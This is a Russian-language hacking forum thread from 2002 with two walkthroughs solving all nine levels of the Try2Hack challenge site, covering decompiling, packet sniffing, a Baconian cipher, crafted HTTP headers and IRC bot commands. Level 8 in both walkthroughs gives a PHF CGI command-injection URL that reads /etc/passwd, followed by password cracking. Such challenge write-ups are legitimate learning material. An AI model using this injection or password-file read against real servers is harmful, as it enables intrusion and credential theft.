Легенда:
 новое сообщение
 закрытая нитка
 новое сообщение
 в закрытой нитке
 старое сообщение
|
- Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
- Новичкам также крайне полезно ознакомиться с данным документом.
| | |
Walkthrough уровни 1-9 09.05.02 18:30 Число просмотров: 3044
Автор: :-) <:-)> Статус: Elderman
|
TRY2HACK WALKTHROUGH
by TechnoWolf, inSiDeR
Level 1: first go to the source code... then you should see the password...simple isnt it?
Level 2: go to notepad, make a html doc with the link to the flash program save it then
open it in a web browser. Then right click the link -> save the target as. open the the
file you saved in notepad. there is the username and password.
Level 3: Ok go to the temporary internet files. and look for a
file called JavaScript.txt open that file.The password is inside.
Level 4: go to the temporary internet files again. copy the file called level4.txt and paste
it on your desktop then open it. The Password should be there
Level 5: download the file on the site and then find a vb3 decompiler. Once you get one,
Decompile it and look at the source.
Level 6: download ethereal(a packet sniffer), if you are using windows you will need
WinPcap. Once you get that go to capture -> start change the interface to DLKRTS click ok
then try to login using the .exe file you downloaded with any username and password then
click stop on the packet sniffer. Find the file with the www.try2hack.nl in it the it should
say GET /p.lv6 on it some where go to http://www.try2hack.nl/p.lv6 and view the source. It
shows you the encrypted username and pass. you must decrypt it. this encryption type is
called baconian encryption.
A = aaaaa I/J = abaaa R = baaaa
B = aaaab K = abaab S = baaab
C = aaaba L = ababa T = baaba
D = aaabb M = ababb U/V = baabb
E = aabaa N = abbaa W = babaa
F = aabab O = abbab X = babab
G = aabba P = abbba Y = babba
H = aabbb Q = abbbb Z = babbb
there you go. figure out the user name and password.
Level 7:download secureCRT.after u do that connect to www.try2hack.nl using it. then typein
the following:
GET /cgi-bin/level7.pl HTTP/1.1
Connection: Keep_Alive
User-agent: MSIE 6.72 (UNIX)
Accept:/Referer: http://www.microsoft.com/ms.htm
Host: www.try2hack.nl
(Hit enter)
there you go onto level 8.
Level 8: Here you gotta use the old PHF bug:
http://www.try2hack.nl/cgi-bin/phf.cgi?Qalias=x%0a/bin/cat%20/etc/passwd
Read instructions now and enjoy lvl 9
Level 9: use ROT 13 translator to decrypt the text and base 64 to decrypt password for the channel #try2hack.level9
now decrypt the binary and here is the solution:
/ctcpreply LEVEL9-539 PING [adduser inSiDeR-w00t *!*insmod@a-ms3-11.tin.it]
/ctcpreply LEVEL9-539 PING [setuser inSiDeR-w00t HOSTS *!*insmod@a-ms3-11.tin.it]
/ctcpreply LEVEL9-539 PING [setuser inSiDeR-w00t PASS insider]
/ctcpreply LEVEL9-539 PING [chattr inSiDeR-w00t +mn]
Just replace bot name and info with your own.
THANKS TO: Shyam, Technowolf, inSiDeR and all the other ones.
---
|
|
<hacking>
|
Головоломка для хакера - Try2Hack 27.03.02 05:01
Автор: Renkvil <Boris> Статус: Member
|
Предлагаю вашему вниманию достатчно известный в западной хакерской сцене сайт из разряда "hack-it" aka "hacker competition"
http://www.try2hack.nl
Сайт предлагает 9 уровней сложности, разнообразные задания (JavaScript, Flash...) и не всегда тривиальные решения.
Решения можно постить нитками, пока dl не прибьёт thread :), или мне на мыло theboris@mail.ru
Если возникнет интерес, запостю ссылки на аналогичные ресурсы.
Борис aka Renkvil
Головоломка для хакера - Try2Hack
|
|
Это наверное единственный пост, который собрал столько просмотров..... уже почти 2200!!! Сильно... 14.05.02 12:11
Автор: DamNet <Denis Amelin> Статус: Elderman
Отредактировано 16.05.02 21:36 Количество правок: 1
|
|
|
| |
На неделе надо будет запостить новую головоломку. 14.05.02 16:28
Автор: Renkvil <Boris> Статус: Member
Отредактировано 14.05.02 16:28 Количество правок: 1
|
|
|
| | |
Только просьба 15.05.02 22:20
Автор: Sir-G Статус: Незарегистрированный пользователь
|
|
не публиковать решения, по крайней мере первое время. Можно говорить до какого уровня дошел и делать небольшие подсказки.
|
| | |
уже ещё что-то нашёл? 14.05.02 16:43
Автор: fly4life <Александр Кузнецов> Статус: Elderman
Отредактировано 14.05.02 16:44 Количество правок: 1
|
|
|
| |
Действительно интересная игра. Затягивает... 14.05.02 16:05
Автор: fly4life <Александр Кузнецов> Статус: Elderman
|
|
|
|
level6: Народ, а какое всё же правильное название... 10.05.02 22:02
Автор: Renkvil <Boris> Статус: Member
|
...для "шифрования" на 6-ом уровне?
Начинается оно на вроде на "B", если верить указанной маске со "*".
Просто интересно стало!
|
| |
Baconian (шифр Бэкона) 11.05.02 10:53
Автор: :-) <:-)> Статус: Elderman
|
|
|
|
Всё это давно уже не головоломка 09.05.02 18:40
Автор: zonny <Sasha> Статус: Member
|
|
|
| |
Скоро наверно будет 10-й уровень 11.05.02 11:17
Автор: :-) <:-)> Статус: Elderman
|
[JuPiLeR] (автор 9-го) работает над ним...
Я 9-й прошел за 3 недели :-)) Тяжеловато, если до этого eggdrop не конфигурил.
IMHO 9-й там как-то глючно работает: сразу после добавления юзера нельзя сделать DCC chat с ботом, но где-то через час получается.
|
| | |
Интересно, кто ещё прошёл все уровни? 11.05.02 22:40
Автор: Renkvil <Boris> Статус: Member
|
|
Я до 6-ого дошёл, потом решение опубликовали..
|
| |
А что же? :-)) 10.05.02 02:19
Автор: Renkvil <Boris> Статус: Member
|
|
|
| | |
Ну все ответы выкладываются, разве это интересно? 10.05.02 15:10
Автор: zonny <Sasha> Статус: Member
|
|
|
| | | |
Ну все ответы выкладываются, разве это интересно? 10.05.02 19:53
Автор: fly4life <Александр Кузнецов> Статус: Elderman
Отредактировано 10.05.02 19:55 Количество правок: 1
|
Модет это и не интересно, но их читать никто не заставляет. Я тож считал, что не интересно и не читал... пока не дошёл до четвёртого уровня ... а потом всё... потерял сон, аппетит... %))
Сам пройти не смог, скока я не геморроился, а узнать что дальше очень хотелось. =) Помогла подсказка из ответов
|
| | | | |
Да вобщем-то тоже самое, но азарт потерялся 10.05.02 20:05
Автор: zonny <Sasha> Статус: Member
|
|
|
| | | | | |
Впринципе да... 10.05.02 20:10
Автор: fly4life <Александр Кузнецов> Статус: Elderman
Отредактировано 10.05.02 20:14 Количество правок: 1
|
|
над остальными я уже так долго не геморроился, как над третьем и втором (всё-таки тянет немного глянуть =)), но... сдаётся мне, что без подсказок я бы не прошёл ни один из них =), а ты? ;)
|
| | | |
Так не читай их. А до куда ты сам дошёл? 10.05.02 18:34
Автор: Renkvil <Boris> Статус: Member
|
|
|
|
Головоломка для хакера - Try2Hack -= решение всех уровней =- 18.04.02 00:03
Автор: VirX Статус: Незарегистрированный пользователь
|
Рабочая неделя кончилась вот и решил заняться :
Level1
View HTML
Passwd : hackerzzz
Next level: levvel2.html
========================================================
Level2
смотрим хетемель
находим там ссылку на флеш и качаем файл FlashLevel2.swf
смотрим фаром и видим:
txtUsername �–
Try2Hack I–
txtPassword �–
NokiaIsGood I��ќ� � ѓ� LLeVeLL3.html
видим, что пароль и логин у нас
Username:Try2Hack
Password:NokiaIsGood
Next level:LLeVeLL3.html
========================================================
Level3
Долго парился не потому что сложно а потому что смотрел невнимательно :(
а там все просто - смотрим хтм и видим:
<SCRIPT src="JavaScript"></SCRIPT>
<SCRIPT language="JavaScript">
.........
качаем файл http://www.try2hack.nl/JavaScript а там видим:
-
PASSWORD = "TheCorrectAnswer";
CORRECTSITE = "thelevel4.html";
WRONGSITE = "http://www.disney.com";
-
========================================================
Level4
Свиду показалось сложно т.к. я на знаю Java, но эт токо свиду
берем JavaDecompiller смотрим, что получилось
я юзал DJ Java Decompiller v2.9.9.61 by 2000 Atanas Neshkov прикольная прога
скачать мона отсюда: http://members.fortunecity.com/neshkov/dj.html
видим строчку:
-
infile = new String("level4");
-
http://www.try2hack.nl/level4
пробуем открыть и видим:
-
5_level_5.html
Try2Hack
AppletsAreEasy
-
логин : Try2Hack
пароль : AppletsAreEasy
и next level : 5_level_5.html
========================================================
Levek 5
Берем декомпилятор VB я скачал с http://dore.ru
видим примерно вот такую хрень
-
Const mc001A ="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~!_$#@()[]{}<\/>"
Const mc001E = "http://www.try2hack.f2s.com/login-level6.html"
Const mc0022 = " txtUsername=AlmostAHacker " |Обмануть хотели :)
Const mc0026 = " txtPassword=ZqrE01A2d " |
Sub cmdLogin_Click ()
Dim l003C As String
Dim l003E As Variant
If txtUsername <> Mid(mc001A, 56, 1) & Mid(mc001A, 28, 1) & Mid(mc001A, 35, 1) & Mid(mc001A, 3, 1) & Mid(mc001A, 44, 1) & Mid(mc001A, 11, 1) & Mid(mc001A, 13, 1) & Mid(mc001A, 21, 1) Then
MsgBox "Username not accepted."
Exit Sub
End If
If txtPassword <> Mid(mc001A, 51, 1) & Mid(mc001A, 31, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 51, 1) & Mid(mc001A, 16, 1) & Mid(mc001A, 45, 1) & Mid(mc001A, 24, 1) & Mid(mc001A, 29, 1) & Mid(mc001A, 26, 1) & Mid(mc001A, 19, 1) & Mid(mc001A, 28, 1) & Mid(mc001A, 11, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 19, 1) & Mid(mc001A, 25, 1) & Mid(mc001A, 24, 1) Then
MsgBox "Username/Password don't match."
Else
MsgBox "User logged in !"
l003C$ = Left$(mc001E, 28) & Mid(mc001A, 22, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 15, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 32, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 15, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 22, 1) & Mid(mc001A, 67, 1) & Mid(mc001A, 7, 1) & Mid(mc001A, 63, 1) & Mid(mc001A, 18, 1) & Mid(mc001A, 30, 1) & Mid(mc001A, 23, 1) & Mid(mc001A, 22, 1)
MsgBox "For Windows NT / Windows 2000 users :" & Chr$(13) & Chr$(10) & Chr$(13) & Chr$(10) & l003C$
l003E = Shell("start " & l003C$)
End If
End Sub
-
хоть бейсика и не знаю, но интуитивно понято, что функция Mid возвращает символы из
строки а оператор '&' их склеивает. Пишим прогу на паскале (можно и самому подсчитать, но впадлу):
---
const
c : string ='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.,:;-*+=~!_$#@()[]{}<\/>';
var
s : string;
begin
write('Username:');
s:=c[56]+c[28]+c[35]+c[3]+c[44]+c[11]+c[13]+c[21];
writeln(s);
write('Password:');
s:=c[51]+c[31]+c[30]+c[51]+c[16]+c[45]+c[24]+c[29]+c[26]+c[19]+c[28]+c[11]+c[30]+c[19]+c[25]+c[24];
writeln(s);
write('Next Level : http://www.try2hack.nl/');
s:=c[22]+c[67]+c[15]+c[67]+c[32]+c[67]+c[15]+c[67]+c[22]+c[67]+c[7]+c[63]+c[18]+c[30]+c[23]+c[22];
writeln(s);
end.
---
Компилим, запускаем и нам вываливает:
Username:Try2Hack
Password:OutOfInspiration
Next Level : http://www.try2hack.nl/l-e-v-e-l-6.html
=================
Level 6
Берем снифер. Я брал Ethernal. Снифаем и видим что идет GET запрос к файлу
http://www.try2hack.nl/p.lv6
там видим следующие:
---
(ENCRYPTION TYPE)
B*C*N**N
(USERNAME)
ababa abbab baaaa aaabb
(PASSWORD)
ababa aaaaa abbaa abbba aaaaa baaaa baaba babba
(PAGE)
ababa aabaa baabb aabaa ababa baaab aabaa baabb aabaa abbaa
�
---
L:LORD
P:LANPARTY
трейсить VB в сайсе квалификации не хватает :(
в криптографии не силен, но после долгих поисков была найдена данная ссылка:
http://tools.100mbit.nl/decrypt.php
---
=================
Level 7
После 6-го прямо халява :)
телнетимся на 80 порт сайта и скармливаем ему нечто типа
---
GET /cgi-bin/level7.pl HTTP/1.1
Accept:/
Referer: http://www.microsoft.com/ms.htm
Accept-Language: ru
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; UNIX/LINUX)
Host: www.try2hack.nl
Connection: Keep-Alive
---
и получаем следующие сообщение (теги выдрал):
Browser check : OK
OS check : OK
Link check : OK
Nextlevel : http://www.try2hack.nl/Level-8.html
Password for the messageboard is : TonyHawk2
===========
Level 8
Полная халява юзишь эксплоит и получаем пароль
http://www.try2hack.nl/cgi-bin/phf.cgi?Qalias=x%0a/bin/cat%20/etc/passwd
причем только Qalias хотя в некоторых багатрахах QALIAS
ну и рипером потом :)
L: BuiZe
P: arsanik
входим и получаем:
User "BuiZe" logged in.
New message for BuiZe :
Level 8 completed !
Go to irc.quakenet.org and join #try2hack
There type /msg bofh begin
===========
Level 9
так и не посмотрел у них на канале бот сдох уже давненько :(
ЗЫ: в принципе просто все кроме 6-го уровня (мне так показалось)
|
| |
Кто-нибудь занимался девятым уровнем? 09.05.02 16:13
Автор: Sir-G Статус: Незарегистрированный пользователь
|
> найдена данная ссылка:
> http://tools.100mbit.nl/decrypt.php
Как же ты ее нашел:)) Я вот лично сам расшифровывал... И что значят магические строчки
(ENCRYPTION TYPE)
B*C*N**N
????
Че-то про 9-ый уровень не понял. Как называется бот, которого надо хачить?(вроде level-9, но такого нет) . К чему там был ключ, выданный ботом try2hack?
|
|
|
подробно о проекте
Анализ криптографических сетевых...
